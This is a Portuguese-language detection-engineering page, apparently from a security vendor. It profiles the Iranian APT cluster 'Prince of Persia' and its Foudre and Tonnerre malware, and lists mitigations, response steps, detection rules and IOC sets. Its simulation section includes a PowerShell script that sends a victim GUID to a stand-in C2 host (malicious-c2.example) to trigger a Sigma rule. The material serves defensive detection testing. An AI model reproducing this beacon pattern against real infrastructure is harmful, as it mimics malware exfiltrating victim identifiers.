Príncipe da Pérsia: Uma Retrospectiva de 10 Anos de Atividades do APT Iraniano
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório perfila o cluster APT ligado ao estado iraniano denominado Príncipe da Pérsia e traça sua progressão ao longo da última década, com ênfase em atividades observadas de 2023 a 2025. Os operadores dependem de famílias de malware personalizadas — incluindo Foudre, Tonnerre, MaxPinner, Rugissement e Deep Freeze — para suportar espionagem e roubo sistemático de dados. Iterações recentes introduzem algoritmos de geração de domínio, comando e controle baseados no Telegram e cargas SFX criptografadas para melhorar a resiliência e o ocultamento. O alvo abrange infraestrutura crítica e redes ligadas a dissidentes em várias regiões.
Investigação
Pesquisadores da SafeBreach seguiram as operações do grupo a partir de 2019, coletando amostras recentes, documentando a arquitetura C2 e analisando a lógica DGA. Eles descriptografaram cargas protegidas, extraíram credenciais de bots do Telegram e construíram uma linha do tempo das variantes lançadas. A pesquisa destaca infraestruturas de produção e teste separadas e detém detalhes de comportamentos de entrega de arquivos ligados a cadeias de infecção conduzidas por Excel. Indicadores de comprometimento foram montados a partir de hashes de malware, domínios e URLs.
Mitigação
Monitore a atividade DNS para os padrões DGA identificados, bloqueie domínios maliciosos conhecidos e restrinja ou inspecione o tráfego relacionado a bots do Telegram. Adicione detecções para os nomes de arquivos de malware mencionados e artefatos DLL de carregamento, e use monitoramento/sinkholing de DNS para expor infraestruturas rotativas. Implemente listas de permissão de aplicativos e fortaleça a segurança do Office limitando macros para reduzir a probabilidade de acesso inicial.
Resposta
Se qualquer indicador for encontrado, coloque o sistema afetado em quarentena, capture provas voláteis e execute forense direcionado em arquivos soltos e caminhos relevantes do registro. Bloqueie todos os domínios e endereços IP associados, gire tokens de bots do Telegram expostos e redefina credenciais para contas impactadas. Procure, em todo o ambiente, por remanescentes de DLL de carregador personalizado e cargas SFX criptografadas para garantir a erradicação completa.
Fluxo de Ataque
Detecções
Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)
Ver
Possível Infiltroção/Exfiltração de Dados/C2 via Serviços/Ferramentas de Terceiros (via proxy)
Ver
Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
Ver
Execução de Taskkill Suspeita (via cmdline)
Ver
IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 2
Ver
IOCs (SourceIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
IOCs (HashSha256) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio Parte 1
Ver
IOCs (HashMd5) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
IOCs (DestinationIP) para detectar: DEZ 18, 2025 Príncipe da Pérsia: Uma Década de Atividade de Campanha APT de Estado-nação Iraniano sob o Microscópio
Ver
Detecção de Infecção Foudre v34 via Arquivo Excel com Executável Embutido [Criação de Processo no Windows]
Ver
Detecção de Comunicação C2 de Foudre e Tonnerre [Conexão de Rede no Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Telemetria & Linha de Base Pré-Voo deve ter sido aprovada.
Racional: Esta seção detalha a execução precisa da técnica do adversário (T1584.005) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.
-
Narrativa & Comandos do Ataque:
O ator de ameaça provisionou um domínio maliciosomalicious-c2.exampleque hospeda o servidor C2 Foudre/Tonnerre. A carga útil do atacante na máquina da vítima realiza duas solicitações HTTP GET:- Envia o GUID da vítima para o endpoint Foudre C2 usando o caminho
/1/?c=<GUID>. - Contata a API do Telegram via backdoor Tonnerre usando o caminho
/t/tga.adr.
Ambas as requisições são feitas via HTTP (para simplificar o registro de proxy) e incluem um User-Agent genérico para mesclar com o tráfego normal. As ações geram os campos exatos (
request_method=GET,urlcontendo as substrings alvo) que a regra Sigma procura. - Envia o GUID da vítima para o endpoint Foudre C2 usando o caminho
-
Script de Teste de Regressão:
# ------------------------------------------------------------ # Simulação de Comunicação C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Defina o GUID da vítima (em uma infecção real, isso seria lido do registro) $guid = (New-Guid).Guid # 2. Defina o host C2 malicioso (substitua por um endereço que você controle para testes) $c2Host = "http://malicious-c2.example" # 3. Envie GUID para o endpoint Foudre C2 $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Enviando GUID para Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Contate a API do Telegram via backdoor Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Contatando endpoint da API do Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulação completa. Verifique o SIEM para alertas."O script é autocontido; executá-lo em um host Windows que encaminha tráfego através do proxy configurado produzirá duas entradas de log que correspondem às condições da regra Sigma
url|containscondições. -
Comandos de Limpeza:
# Remova quaisquer conexões de rede temporárias (só relevante se o proxy criar sessões persistentes) # Aqui simplesmente limpamos o cache DNS para evitar a resolução prolongada do host malicioso. ipconfig /flushdns Write-Host "[*] Limpeza completa."